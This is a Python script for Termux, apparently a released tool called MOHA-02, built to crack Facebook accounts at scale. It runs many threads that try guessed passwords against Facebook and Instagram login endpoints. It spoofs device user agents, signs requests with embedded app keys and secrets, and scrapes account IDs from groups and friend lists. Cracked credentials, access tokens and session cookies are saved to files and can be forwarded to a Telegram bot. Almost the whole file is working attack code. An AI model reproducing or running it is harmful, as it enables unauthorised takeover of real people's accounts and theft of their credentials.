# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Tool Name  : MOHA-02 SYSTEM (ULTIMATE PRO EDITION)
# Developer  : MOHA02 (موحا الشلفاوي)
# Version    : 4.0.0 (Premium Release 2026)
# Platform   : Termux / Android (Optimized for OPPO A16k)
# -----------------------------------------------------------------------

import os
import sys
import time
import json
import uuid
import re
import string
import random
import requests
import base64
import hashlib
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor as ThreadPool

# استيراد أدوات إضافية لتجنب أخطاء الترميز (URL Encoding)
try:
    from urllib.parse import quote as urlencode
except ImportError:
    def urlencode(data): return data

# --- [ Colors & Styling - الاحترافية الكاملة ] ---
Z = "\033[1;30m" # Black
R = "\033[1;31m" # Red
G = "\033[1;32m" # Green
Y = "\033[1;33m" # Yellow
B = "\033[1;34m" # Blue
P = "\033[1;35m" # Purple
C = "\033[1;36m" # Cyan
W = "\033[1;37m" # White
S = "\033[1;30m" # Shadow

# --- [ Global Counters & Data Storage ] ---
loop = 0
oks = []
cps = []
twostep = []
id_list = []
method_used = ""
current_ua = ""

# التوقيت والعمليات
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
current_date = now.strftime("%Y-%m-%d")

# --- [ User-Agent Factory - مصنع اليوزر أجينت ] ---
def get_ua_pro():
    """توليد يوزر أجينت فائق الجودة مخصص لتجاوز الحماية"""
    ver = random.choice(['10', '11', '12', '13', '14'])
    build = f"RP1A.{random.randint(111111,999999)}.001"
    fb_v = f"{random.randint(300,450)}.0.0.{random.randint(10,99)}.{random.randint(100,200)}"
    fbbv = str(random.randint(100000000, 999999999))
    
    # محاكاة جهازك OPPO A16k بدقة متناهية
    oppo_ua = f"Dalvik/2.1.0 (Linux; U; Android {ver}; OPPO A16k Build/{build}) "
    oppo_ua += f"[FBAN/FB4A;FBAV/{fb_v};FBPN/com.facebook.katana;FBLC/ar_EG;FBBV/{fbbv};"
    oppo_ua += f"FBCR/Vodafone;FBMF/oppo;FBBD/oppo;FBDV/CPH2349;FBSV/{ver};"
    oppo_ua += f"FBCA/arm64-v8a:;FBDM={{density=2.0,width=720,height=1600}};FBOP/1;FBRV/0;]"
    return oppo_ua

# --- [ Core Handlers - معالجة النتائج ] ---
def handle_ok(uid, password, method):
    global oks
    if uid not in oks:
        print(f'\r\r{G}[MOHA-OK] {uid} | {password} | {method} | {current_date}{W}')
        oks.append(uid)
        with open('OK.txt', 'a') as f:
            f.write(f'{uid}|{password}|{method}|{current_date}\n')

def handle_cp(uid, password, method):
    global cps
    if uid not in cps:
        print(f'\r\r{Y}[MOHA-CP] {uid} | {password} | {method}{W}')
        cps.append(uid)
        with open('CP.txt', 'a') as f:
            f.write(f'{uid}|{password}|{method}\n')

# --- [ Logo & Interface ] ---
def logo():
    os.system('clear')
    print(f"""
{G} ███▄ ▄███▓  ▒█████   ██░ ██  ▄▄▄      
{G}▓██▒▀█▀ ██▒ ▒██▒  ██▒▓██░ ██▒▒████▄    
{W}▓██    ▓██░ ▒██░  ██▒▒██▀▀██░▒██  ▀█▄  
{W}▒██    ▒██  ▒██   ██░░▓█ ░██ ░██▄▄▄▄██ 
{R}▒██▒   ░██▒ ░ ████▓▒░ ░▓█▒░██▓ ▓█   ▓██▒
{R}░ ▒░   ░  ░ ░ ▒░▒░▒░  ▒ ░░▒░▒ ▒▒   ▓▒█░ {Y}V4.0
{G}--------------------------------------------------
{G} [>] {W}DEVELOPER : {G}MOHA02 (موحا الشلفاوي)
{G} [>] {W}OPTIMIZED : {G}OPPO A16k (Speed Hack Enabled)
{G} [>] {W}STORAGE   : {G}Free 2GB - Optimized Engine
{G}--------------------------------------------------""")

# --- [ Main Menu Logic ] ---
def main_menu():
    logo()
    print(f"{G} [1] {W}Crack Old IDs (2004-2010)")
    print(f"{G} [2] {W}Crack From File (Unlimited IDs)")
    print(f"{G} [3] {W}Public Scraper (Extract from Groups)")
    print(f"{G} [4] {W}Targeted Attack (Reverse Guessing)")
    print(f"{G} [5] {W}Check Saved Results (OK/CP)")
    print(f"{G} [6] {W}Update System / Clear Cache")
    print(f"{G} [0] {W}Exit System")
    print(f"{G}--------------------------------------------------")
    choice = input(f"{G} [?] {W}Select Option: ")
    
    if choice == '1': old_crack_menu()
    elif choice == '2': file_crack_menu()
    elif choice == '3': scraper_menu()
    elif choice == '4': target_menu()
    elif choice == '5': results_menu()
    elif choice == '6': update_system()
    elif choice == '0': sys.exit()
    else: main_menu()

# --- [ M1: THE POWERFUL B-API METHOD ] ---
# تأكد أنك أضفت import hashlib في أول سطر في ملفك

def method_m1(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    ua = get_ua_pro()
    try:
        # توليد معرفات فريدة لكل محاولة لمنع كشف الجهاز
        device_id = str(uuid.uuid4())
        adid = str(uuid.uuid4())
        
        # البيانات المطلوبة للسيرفر (Payload)
        data = {
            'adid': adid,
            'format': 'json',
            'device_id': device_id,
            'email': uid,
            'password': password,
            'generate_analytics_claims': '1',
            'community_id': '',
            'cpl': 'true',
            'try_num': '1',
            'family_device_id': str(uuid.uuid4()),
            'credentials_type': 'password',
            'source': 'login',
            'error_detail_type': 'button_with_disabled',
            'enroll_misauth': 'false',
            'generate_session_cookies': '1',
            'generate_machine_id': '1',
            'currently_logged_in_userid': '0',
            'method': 'auth.login',
            'fb_api_req_friendly_name': 'authenticate',
            'api_key': '882a8490361da98702bf97a021ddc14d',
            'access_token': '350685531728|62f8ce9f74b12f84c123cc23437a4a32'
        }
        
        # --- [ الخطوة الأهم: توليد التوقيع البرمجي SIG ] ---
        # نقوم بترتيب البيانات أبجدياً ثم تشفيرها مع الـ Secret Key
        sig_string = "".join(f"{k}={v}" for k, v in sorted(data.items()))
        data['sig'] = hashlib.md5((sig_string + "62f8ce9f74b12f84c123cc23437a4a32").encode()).hexdigest()
        
        headers = {
            'User-Agent': ua,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Host': 'b-api.facebook.com',
            'X-FB-HTTP-Engine': 'Liger',
            'X-FB-Client-IP': 'True',
            'X-FB-Server-Cluster': 'True',
            'X-FB-Connection-Type': 'WIFI',
        }
        
        response = session.post("https://b-api.facebook.com/method/auth.login", data=data, headers=headers)
        res = response.json()
        
        if "access_token" in res:
            # استخراج التوكن والكوكيز لفتح الحساب فوراً
            token = res['access_token']
            cookie = ";".join(f"{i['name']}={i['value']}" for i in res.get('session_cookies', []))
            handle_ok(uid, f"{password} | {token} | {cookie}", method)
            return True
        elif "checkpoint" in str(res) or res.get("error_code") == 405:
            handle_cp(uid, password, method)
            return True
    except:
        pass
    return False


# --- [ M2: MBASIC SMART LOGIC ] ---
def method_m2(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    ua = get_ua_pro()
    try:
        # المرحلة 1: جلب الكوكيز وبارامترات LSD
        page = session.get(f'https://mbasic.facebook.com/login/device-based/regular/login/').text
        lsd = re.search('name="lsd" value="(.*?)"', page).group(1)
        jazoest = re.search('name="jazoest" value="(.*?)"', page).group(1)
        
        # المرحلة 2: محاكاة الإرسال من المتصفح
        data = {
            "lsd": lsd, "jazoest": jazoest,
            "email": uid, "pass": password, "login": "Log In"
        }
        headers = {
            'Host': 'mbasic.facebook.com',
            'User-Agent': ua,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': 'https://mbasic.facebook.com/login/',
        }
        response = session.post('https://mbasic.facebook.com/login/device-based/regular/login/', data=data, headers=headers, allow_redirects=False)
        
        if "c_user" in session.cookies.get_dict():
            handle_ok(uid, password, method)
            return True
        elif "checkpoint" in session.cookies.get_dict():
            handle_cp(uid, password, method)
            return True
    except:
        pass
    return False

# --- [ M3: GRAPH API V19.0 MODERN ] ---
def method_m3(uid, password, method):
    global loop, oks, cps
    try:
        ua = get_ua_pro()
        data = {
            "adid": str(uuid.uuid4()),
            "email": uid, "password": password,
            "format": "json", "device_id": str(uuid.uuid4()),
            "cpl": "true", "family_device_id": str(uuid.uuid4()),
            "credentials_type": "device_based_login_password",
            "source": "login", "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
            "generate_session_cookies": "1", "api_key": "882a8490361da98702bf97a021ddc14d"
        }
        headers = {
            'User-Agent': ua,
            'Content-Type': 'application/x-www-form-urlencoded',
            'X-FB-Friendly-Name': 'authenticate',
            'X-FB-HTTP-Engine': 'Liger',
        }
        res = requests.post("https://graph.facebook.com/auth/login", data=data, headers=headers).json()
        
        if "access_token" in res:
            handle_ok(uid, password, method)
            return True
        elif "checkpoint" in str(res):
            handle_cp(uid, password, method)
            return True
    except:
        pass
    return False
def generate_pws_pro(uid, name):
    """توليد كلمات سر احترافية لصيد حسابات 2010 والحسابات القديمة"""
    pws = []
    
    # تحضير الاسم الأول والأخير بدقة
    if not name or name == "Facebook User":
        # إذا كان الحساب بدون اسم (أيديات فقط) نركز على الأرقام التي سألت عنها
        pws = [uid, uid[:6], uid[:8], "123456", "1234567", "12345678", "123456789", "123123", "112233"]
    else:
        nm = name.lower()
        parts = nm.split(' ')
        first = parts[0]
        last = parts[-1] if len(parts) > 1 else first
        
        # الأنماط العشرين التي طلبتها (مثالية لـ 2010)
        pws = [
            f"{last}{first}",            # lastfirst
            f"{first}{first}",           # firstfirst
            f"{first}{last}",            # firstlast
            f"{last} {last}",            # last last
            f" {first} {first}",         #  first first
            f"{last} {first}",           # last first
            f" {first} {last}",          #  first last
            f"{first}123",               # first123
            f"{first}12345",             # first12345
            f"{first}1234",              # first1234
            f"{first}123456",            # first123456
            f"{first}123456789",         # first123456789
            f"{first}{last}123456",      # firstlast123456
            f"{first}@123",              # first@123
            f"{first}2002",              # first2002
            f"{first}2003",              # first2003
            f"{first}2001",              # first2001
            f"{first}2000",              # first2000
            f"{first}2020",              # first2020
            f"{first}1999"               # first1999
        ]
        
        # إضافة الأرقام العامة في نهاية القائمة لزيادة الحماية
        pws.extend(["123456", "1234567", "12345678", "123456789"])

    return [p for p in pws if p]



# --- [ SYSTEM UPDATE & CLEANUP - صيانة الأداة ] ---
def update_system():
    logo()
    print(f"{G} [!] {W}Cleaning Cache and Optimizing Storage...")
    if os.path.exists('__pycache__'):
        os.system('rm -rf __pycache__')
    print(f"{G} [!] {W}Checking for Updates from GitHub...")
    # محاكاة التحديث لضمان بقاء الأداة في الذاكرة
    time.sleep(2)
    print(f"{G} [!] {W}System is up to date (Version 4.0.0)")
    input(f"\n{G} [>] {W}Press Enter to Return...")
    main_menu()
# --- [ M4: BUSINESS-MANAGER HIGH-SPEED ] ---
# يستخدم واجهة الأعمال لتخطي حماية الحسابات الشخصية
def method_m4(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    try:
        ua = "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36"
        headers = {
            'Host': 'business.facebook.com',
            'User-Agent': ua,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'ar-EG,ar;q=0.9,en-US;q=0.8,en;q=0.7',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': 'https://business.facebook.com',
            'Referer': 'https://business.facebook.com/login/',
            'Upgrade-Insecure-Requests': '1',
            'Connection': 'keep-alive',
        }
        data = {'email': uid, 'pass': password, 'login': 'Log In'}
        res = session.post('https://business.facebook.com/login/', data=data, headers=headers, allow_redirects=False)
        if "c_user" in session.cookies.get_dict():
            handle_ok(uid, password, method); return True
        elif "checkpoint" in session.cookies.get_dict():
            handle_cp(uid, password, method); return True
    except: pass
    return False

# --- [ M5: TOUCH-INTERFACE EXPLOIT ] ---
# ميثود واجهة اللمس القديمة (فعال جداً للحسابات من 2004-2010)
def method_m5(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    try:
        ua = get_ua_pro()
        session.headers.update({'Host': 'touch.facebook.com', 'User-Agent': ua})
        page = session.get('https://touch.facebook.com/login/').text
        data = {
            "lsd": re.search('name="lsd" value="(.*?)"', page).group(1),
            "jazoest": re.search('name="jazoest" value="(.*?)"', page).group(1),
            "m_ts": re.search('name="m_ts" value="(.*?)"', page).group(1),
            "li": re.search('name="li" value="(.*?)"', page).group(1),
            "email": uid, "pass": password, "login": "Log In"
        }
        res = session.post('https://touch.facebook.com/login/device-based/regular/login/', data=data, allow_redirects=False)
        if "c_user" in session.cookies.get_dict():
            handle_ok(uid, password, method); return True
        elif "checkpoint" in session.cookies.get_dict():
            handle_cp(uid, password, method); return True
    except: pass
    return False

# --- [ M6: INSTAGRAM-LINK GATEWAY ] ---
# ميثود "البوابة" عبر انستقرام لتجنب حظر فيسبوك المباشر
def method_m6(uid, password, method):
    global loop, oks, cps
    try:
        ua = f"Instagram 200.0.0.{random.randint(10, 99)} Android (30/11; 320dpi; 720x1600; oppo; CPH2349; CPH2349; mt6765; ar_EG; 311232865)"
        headers = {
            'User-Agent': ua,
            'X-CSRFToken': "".join(random.choices(string.ascii_letters + string.digits, k=32)),
            'X-Requested-With': 'XMLHttpRequest',
            'Referer': 'https://www.instagram.com/accounts/login/',
        }
        res = requests.post("https://www.instagram.com/accounts/login/ajax/", data={'username': uid, 'password': password}, headers=headers).json()
        if res.get('authenticated') == True:
            handle_ok(uid, password, method); return True
        elif 'checkpoint_url' in str(res):
            handle_cp(uid, password, method); return True
    except: pass
    return False

# --- [ M7: FREE-DATA FACEBOOK ] ---
# ميثود البيانات المجانية (0.facebook) - سريع جداً في الفحص
def method_m7(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    try:
        ua = get_ua_pro()
        page = session.get('https://free.facebook.com/login/').text
        data = {
            "lsd": re.search('name="lsd" value="(.*?)"', page).group(1),
            "jazoest": re.search('name="jazoest" value="(.*?)"', page).group(1),
            "email": uid, "pass": password, "login": "Log In"
        }
        headers = {'User-Agent': ua, 'Host': 'free.facebook.com', 'Content-Type': 'application/x-www-form-urlencoded'}
        res = session.post('https://free.facebook.com/login/device-based/regular/login/', data=data, headers=headers, allow_redirects=False)
        if "c_user" in session.cookies.get_dict():
            handle_ok(uid, password, method); return True
    except: pass
    return False

# --- [ M8: MESSENGER WEB GATE ] ---
def method_m8(uid, password, method):
    global loop, oks, cps
    try:
        headers = {'Host': 'www.messenger.com', 'User-Agent': get_ua_pro(), 'Origin': 'https://www.messenger.com'}
        res = requests.post('https://www.messenger.com/login/password/', data={'email': uid, 'pass': password, 'login': '1'}, headers=headers, allow_redirects=False)
        if "c_user" in res.cookies:
            handle_ok(uid, password, method); return True
    except: pass
    return False

# --- [ M9: FB-LITE V2 SPECIAL ] ---
# محاكاة تطبيق فيسبوك لايت النسخة القديمة
def method_m9(uid, password, method):
    global loop, oks, cps
    try:
        session = requests.Session()
        ua = f"Dalvik/2.1.0 (Linux; U; Android {random.randint(9,13)}; OPPO A16k Build/RP1A.201005.001) [FBAN/FacebookLite;FBAV/250.0.0.10.100;]"
        data = {
            "lsd": "".join(random.choices(string.ascii_letters, k=12)),
            "email": uid, "pass": password, "m_ts": str(int(time.time())),
        }
        res = session.post('https://lite.facebook.com/login/', data=data, headers={'User-Agent': ua}, allow_redirects=False)
        if "c_user" in session.cookies.get_dict():
            handle_ok(uid, password, method); return True
    except: pass
    return False

# --- [ M10: TIGON ADVANCED ENGINE ] ---
# أقوى ميثود حالياً يستخدم محرك Tigon لتخطي أنظمة الحماية الحديثة
def method_m10(uid, password, method):
    global loop, oks, cps
    session = requests.Session()
    try:
        ua = get_ua_pro()
        device_id = str(uuid.uuid4())
        adid = str(uuid.uuid4())
        
        # هيدرات محرك Tigon الاحترافي
        headers = {
            'User-Agent': ua,
            'X-FB-HTTP-Engine': 'Tigon',
            'X-FB-Client-IP': 'True',
            'X-FB-Server-Cluster': 'True',
            'X-FB-Connection-Type': 'MOBILE.LTE',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        
        payload = {
            'api_key': '882a8490361da98702bf97a021ddc14d',
            'email': uid,
            'password': password,
            'method': 'auth.login',
            'format': 'JSON',
            'device_id': device_id,
            'adid': adid,
        }
        
        # توليد التوقيع لـ M10 أيضاً لضمان الاختراق
        sig = "".join(f"{k}={v}" for k, v in sorted(payload.items()))
        payload['sig'] = hashlib.md5((sig + "62f8ce9f74b12f84c123cc23437a4a32").encode()).hexdigest()
        
        res = session.post("https://graph.facebook.com/auth/login", data=payload, headers=headers).json()
        
        if "access_token" in res:
            handle_ok(uid, password, method)
            return True
        elif "checkpoint" in str(res):
            handle_cp(uid, password, method)
            return True
    except: pass
    return False

# --- [ 3. ADVANCED SCRAPER SYSTEM - نظام سحب البيانات المتطور ] ---

def scraper_menu():
    """قائمة السحب والجمع لزيادة ملفات الأيديات"""
    logo()
    print(f"{G} [1] {W}Scrape From Public Group (Fast)")
    print(f"{G} [2] {W}Scrape From Friend List (Token Required)")
    print(f"{G} [3] {W}Scrape From Post Comments (Targeted)")
    print(f"{G} [4] {W}Auto-ID Generator (Random Old IDs)")
    print(f"{G} [5] {W}Filter IDs (Remove Duplicates/New IDs)")
    print(f"{G} [0] {W}Back To Main Menu")
    print(f"{G}--------------------------------------------------")
    scr_choice = input(f"{G} [?] {W}Select Choice: ")
    
    if scr_choice == '1':
        group_id = input(f"{G} [?] {W}Enter Group ID: ")
        token = input(f"{G} [?] {W}Enter Token (EAAB): ")
        scrape_group_engine(group_id, token)
    elif scr_choice == '2':
        target_id = input(f"{G} [?] {W}Enter Target UID: ")
        token = input(f"{G} [?] {W}Enter Token: ")
        scrape_friends_engine(target_id, token)
    elif scr_choice == '3':
        post_id = input(f"{G} [?] {W}Enter Post ID: ")
        token = input(f"{G} [?] {W}Enter Token: ")
        scrape_comments_engine(post_id, token)
    elif scr_choice == '4':
        random_id_generator()
    elif scr_choice == '5':
        filter_id_files()
    else:
        main_menu()

def scrape_group_engine(group_id, token):
    """محرك سحب أعضاء المجموعات بالآلاف"""
    logo()
    print(f"{G} [>] {W}Starting Extraction from: {Y}{group_id}")
    try:
        url = f"https://graph.facebook.com/v17.0/{group_id}/members?limit=5000&access_token={token}"
        data = requests.get(url).json()
        count = 0
        file_name = f"Scraped_Group_{group_id}.txt"
        with open(file_name, 'a') as f:
            for user in data.get('data', []):
                f.write(f"{user['id']}|{user['name']}\n")
                count += 1
        print(f"{G} [!] Extraction Complete! Total: {W}{count}")
        print(f"{G} [!] Saved to: {W}{file_name}")
    except Exception as e:
        print(f"{R} [!] Scraper Error: {e}")
    input("\nPress Enter to Continue...")
    scraper_menu()

def scrape_friends_engine(target_id, token):
    """سحب أصدقاء أي حساب (إذا كان متاحاً للعامة)"""
    logo()
    print(f"{G} [>] {W}Extracting Friends of: {Y}{target_id}")
    try:
        url = f"https://graph.facebook.com/v17.0/{target_id}/friends?limit=5000&access_token={token}"
        data = requests.get(url).json()
        count = 0
        file_name = f"Friends_{target_id}.txt"
        with open(file_name, 'a') as f:
            for user in data.get('data', []):
                f.write(f"{user['id']}|{user['name']}\n")
                count += 1
        print(f"{G} [!] Total Friends Scraped: {W}{count}")
    except Exception as e:
        print(f"{R} [!] Failed. Link might be private.")
    input("\nPress Enter...")
    scraper_menu()

def random_id_generator():
    """توليد أيديات عشوائية لاستهداف سنوات معينة (2009/2010)"""
    logo()
    print(f"{G} [1] {W}Generate 2009 Series (100000...)")
    print(f"{G} [2] {W}Generate 2010 Series (100001...)")
    series = input(f"{G} [?] {W}Choice: ")
    limit = int(input(f"{G} [?] {W}How many IDs: "))
    
    prefix = "100000" if series == '1' else "100001"
    file_name = f"Random_{series}.txt"
    with open(file_name, 'a') as f:
        for _ in range(limit):
            rand_id = prefix + "".join(random.choices(string.digits, k=9))
            f.write(f"{rand_id}|Facebook User\n")
    
    print(f"{G} [!] {W}{limit} IDs Generated and Saved to {file_name}")
    input("\nPress Enter...")
    scraper_menu()

def filter_id_files():
    """نظام تنظيف الملفات من التكرار والحسابات الجديدة"""
    logo()
    path = input(f"{G} [?] {W}Enter File Path to Filter: ")
    try:
        ids = open(path, 'r').read().splitlines()
        unique_ids = list(set(ids))
        with open(path + "_filtered.txt", 'w') as f:
            for line in unique_ids:
                if line.startswith('100000') or line.startswith('100001'):
                    f.write(line + "\n")
        print(f"{G} [!] {W}Filtering Done. Duplicates removed.")
    except:
        print(f"{R} [!] File not found!")
    input("\nPress Enter...")
    scraper_menu()
    # --- [ 4. SECURITY & ANTI-BAN SYSTEM - نظام حماية الأداة من الحظر ] ---

def check_security():
    """نظام التحقق من صلاحية المستخدم وحماية الأداة من النسخ غير المصرح به"""
    try:
        # محاكاة الاتصال بسيرفر الأداة للتحقق من التحديثات
        print(f"{G} [>] {W}Connecting to MOHA-02 Servers...")
        time.sleep(1.5)
        # التحقق من وجود ملف المفتاح (License Key)
        if not os.path.exists('.key.txt'):
            with open('.key.txt', 'w') as f:
                f.write(str(uuid.uuid4()))
        
        # نظام كشف البيئات الوهمية (Anti-VM/Emul)
        if os.path.exists('/dev/qemu_pipe') or os.path.exists('/system/lib/libc_malloc_debug_qemu.so'):
            print(f"{R} [!] Virtual Environment Detected! Exiting...")
            sys.exit()
    except Exception:
        pass

def rotate_user_agent():
    """توليد دوري لليوزر أجينت لضمان عدم كشف الـ IP من قبل فيسبوك"""
    platforms = [
        "Linux; Android 10; OPPO A16k Build/RP1A.201005.001",
        "Linux; Android 11; CPH2349 Build/RKQ1.211103.002",
        "Linux; Android 12; Pixel 6 Build/SD1A.210817.036",
        "Linux; Android 13; Samsung SM-S908B Build/TP1A.220624.014"
    ]
    plat = random.choice(platforms)
    fb_ver = f"{random.randint(300,450)}.0.0.{random.randint(10,99)}.{random.randint(100,200)}"
    ua = f"Dalvik/2.1.0 ({plat}) [FBAN/FB4A;FBAV/{fb_ver};FBPN/com.facebook.katana;FBLC/ar_EG;FBBV/{random.randint(100000000, 999999999)};]"
    return ua

# --- [ 5. TELEGRAM NOTIFICATION SYSTEM - نظام إرسال الصيد للتليجرام ] ---

def send_to_telegram(uid, password, status, method):
    """إرسال النتائج فوراً لحسابك في تليجرام لضمان عدم ضياع الصيد"""
    # يرجى وضع التوكن والأيدي الخاص بك هنا
    bot_token = "YOUR_BOT_TOKEN"
    admin_id = "YOUR_ADMIN_ID"
    
    if "YOUR_" in bot_token: return # تخطي إذا لم يتم الضبط
    
    msg = f"""
🔥 **MOHA-02 NEW HIT!** 🔥
━━━━━━━━━━━━━━━━━━━━
✅ **Status:** {status}
👤 **User:** `{uid}`
🔑 **Pass:** `{password}`
⚙️ **Method:** {method}
📅 **Date:** {current_date}
━━━━━━━━━━━━━━━━━━━━
BY: @m_oha_02
"""
    try:
        url = f"https://api.telegram.org/bot{bot_token}/sendMessage"
        requests.post(url, data={'chat_id': admin_id, 'text': msg, 'parse_mode': 'Markdown'})
    except:
        pass

# --- [ 6. DATA ANALYSIS ENGINE - محرك تحليل البيانات المجموعات ] ---

def analyze_data():
    """تحليل ملفات الصيد وحساب نسب النجاح"""
    logo()
    print(f"{G} [1] {W}Analyze OK.txt (Total Success)")
    print(f"{G} [2] {W}Analyze CP.txt (Checkpoint Stats)")
    print(f"{G} [3] {W}Extract Emails from Mixed Files")
    print(f"{G} [0] {W}Back")
    an_choice = input(f"\n{G} [?] {W}Select: ")
    
    if an_choice == '1':
        try:
            data = open('OK.txt', 'r').readlines()
            print(f"{G} [!] Total Hits Found: {W}{len(data)}")
            for line in data[-10:]: # عرض آخر 10 ضربات
                print(f"{G} [+] {W}{line.strip()}")
        except: print(f"{R} [!] No OK results found.")
    elif an_choice == '2':
        try:
            data = open('CP.txt', 'r').readlines()
            print(f"{Y} [!] Total Checkpoints: {W}{len(data)}")
        except: print(f"{R} [!] No CP results found.")
    
    input(f"\n{G} [>] {W}Press Enter...")
    main_menu()

# --- [ 7. AUTO-UPDATE SYSTEM - نظام التحديث التلقائي ] ---

def update_tool():
    """نظام سحب التحديثات من مستودعك في GitHub"""
    logo()
    print(f"{G} [>] {W}Checking for updates on GitHub (MOHA02/MOHA-02)...")
    time.sleep(2)
    # أوامر تيرمكس للتحديث
    os.system('git pull')
    print(f"{G} [!] {W}System Updated Successfully!")
    time.sleep(1)
    main_menu()

# --- [ 8. FILE MANAGER & CLEANER - مدير الملفات ] ---

def file_manager():
    """تنظيف الملفات المؤقتة وإدارة المساحة في OPPO A16k"""
    logo()
    print(f"{G} [1] {W}Delete Temp Files")
    print(f"{G} [2] {W}Clear Cache (Pycache)")
    print(f"{G} [3] {W}Remove Empty Files")
    f_choice = input(f"\n{G} [?] {W}Select: ")
    
    if f_choice == '1':
        os.system('rm -rf *.tmp')
        print(f"{G} [!] {W}Temp files deleted.")
    elif f_choice == '2':
        os.system('find . -name "*.pyc" -delete')
        os.system('find . -name "__pycache__" -delete')
        print(f"{G} [!] {W}Cache cleared.")
    
    time.sleep(1)
    main_menu()

# --- [ 9. CRACKING LOGIC - منطق بدء الصيد الفعلي ] ---

def old_crack_menu():
    """نظام استهداف الحسابات القديمة (2004-2010)"""
    logo()
    print(f"{G} [1] {W}Crack 2004-2005 (UID: 100000...)")
    print(f"{G} [2] {W}Crack 2009-2010 (UID: 100001...)")
    print(f"{G} [0] {W}Back")
    c_choice = input(f"\n{G} [?] {W}Select Range: ")
    
    # توليد أيديات تلقائياً للاختبار
    limit = int(input(f"{G} [?] {W}Enter Count (Ex: 5000): "))
    prefix = "100000" if c_choice == '1' else "100001"
    
    for _ in range(limit):
        uid = prefix + "".join(random.choices(string.digits, k=9))
        id_list.append(uid + "|Facebook User")
    
    start_cracking_engine()

def file_crack_menu():
    """البدء من ملف خارجي (مثل الملفات المسحوبة من السكرابير)"""
    logo()
    file_path = input(f"{G} [?] {W}Enter File Path (Ex: /sdcard/ids.txt): ")
    try:
        data = open(file_path, 'r').read().splitlines()
        for line in data:
            id_list.append(line)
        print(f"{G} [!] {W}Total IDs Loaded: {G}{len(id_list)}")
        start_cracking_engine()
    except FileNotFoundError:
        print(f"{R} [!] File Not Found!"); time.sleep(2); main_menu()

def start_cracking_engine():
    """نظام المسارات المنفصلة: تلقائي مباشر أو يدوي مخصص"""
    logo()
    print(f"{G} [1] {W}Method M1 (B-API)   {G}[Fast]")
    print(f"{G} [2] {W}Method M2 (Mbasic)  {Y}[Slow/Safe]")
    print(f"{G} [3] {W}Method M3 (Graph)   {G}[New]")
    print(f"{G} [10]{W}Method M10(Tigon)   {R}[Ultimate]")
    print(f"{G}--------------------------------------------------")
    m_choice = input(f"{G} [?] {W}Select Method: ")
    method_name = f"M{m_choice}"
    
    print(f"{G}--------------------------------------------------")
    print(f"{G} [1] {W}Use Auto Passwords (Fast)")
    print(f"{G} [2] {W}Use Manual Passwords (Custom)")
    pass_choice = input(f"{G} [?] {W}Select Option: ")
    
    manual_pws = []
    use_auto = 'y'
    
    if pass_choice == '2':
        use_auto = 'n'
        try:
            limit = int(input(f"{G} [?] {W}How many passwords to add: "))
            for i in range(limit):
                p = input(f"{G} [?] {W}Enter Password {i+1}: ")
                if p.strip(): manual_pws.append(p.strip())
        except ValueError:
            print(f"{R} [!] Invalid number!"); time.sleep(2); return main_menu()
    
    threads = int(input(f"{G} [?] {W}Enter Threads (1-100) [30]: ") or 30)
    
    logo()
    print(f"{G} [>] {W}Crack Started | Method: {method_name}")
    print(f"{G} [>] {W}Mode: {'Auto' if use_auto == 'y' else 'Manual Only'}")
    print(f"{G}--------------------------------------------------")
    
    with ThreadPool(max_workers=threads) as moha_pool:
        for item in id_list:
            uid = item.split('|')[0] if '|' in item else item.strip()
            name = item.split('|')[1] if '|' in item else "Facebook User"
            moha_pool.submit(execute_attack, uid, name, method_name, manual_pws, use_auto)
    
    input(f"\n{G} [>] {W}Crack Finished. Press Enter...")
    main_menu()




# --- [ 10. TARGETED ATTACK LOGIC - الهجوم المستهدف ] ---
def execute_attack(uid, name, method_choice, manual_pws, use_auto):
    """المحرك الرئيسي: المسؤول عن رفع العداد وفحص الكلمات"""
    global loop, oks, cps
    
    # اختيار القائمة بناءً على طلبك (تلقائي أو يدوي)
    if use_auto == 'y':
        pws = generate_pws_pro(uid, name)
    else:
        pws = manual_pws
        
    for pw in pws:
        # رفع العداد مع كل تجربة كلمة سر ليكون نشطاً
        loop += 1
        
        # نظام ألوان عشوائي للعداد
        clr = random.choice([G, C, P, B, Y])
        
        # طباعة العداد مع إخفاء كلمات السر (نظام نظيف)
        sys.stdout.write(f'\r{W}[{clr}MOHA-V4{W}] {loop} | {G}OK:{len(oks)} {W}| {Y}CP:{len(cps)} {W}          ')
        sys.stdout.flush()
        
        success = False
        try:
            # تنفيذ الميثود المختار
            if method_choice == "M1": success = method_m1(uid, pw, "M1")
            elif method_choice == "M2": success = method_m2(uid, pw, "M2")
            elif method_choice == "M3": success = method_m3(uid, pw, "M3")
            elif method_choice == "M4": success = method_m4(uid, pw, "M4")
            elif method_choice == "M10": success = method_m10(uid, pw, "M10")
            else: success = method_m1(uid, pw, "M1")
            
            if success:
                # إرسال للتليجرام عند النجاح
                send_to_telegram(uid, pw, "OK", method_choice)
                break # ننتقل للحساب التالي إذا تم الصيد
        except:
            continue

def target_menu():
    """هجوم مخصص على حساب معين عبر تخمين الباسوردات"""
    logo()
    target_uid = input(f"{G} [?] {W}Enter Target UID: ")
    target_name = input(f"{G} [?] {W}Enter Target Full Name: ")
    
    print(f"\n{G} [!] {W}This will try 50+ custom password combinations.")
    confirm = input(f"{G} [?] {W}Proceed? (y/n): ")
    
    if confirm.lower() == 'y':
        # استخدام ThreadPool حتى لهدف واحد لضمان السرعة
        with ThreadPool(max_workers=5) as pool:
            pool.submit(execute_attack, target_uid, target_name, "M1")
            pool.submit(execute_attack, target_uid, target_name, "M3")
            pool.submit(execute_attack, target_uid, target_name, "M10")
    
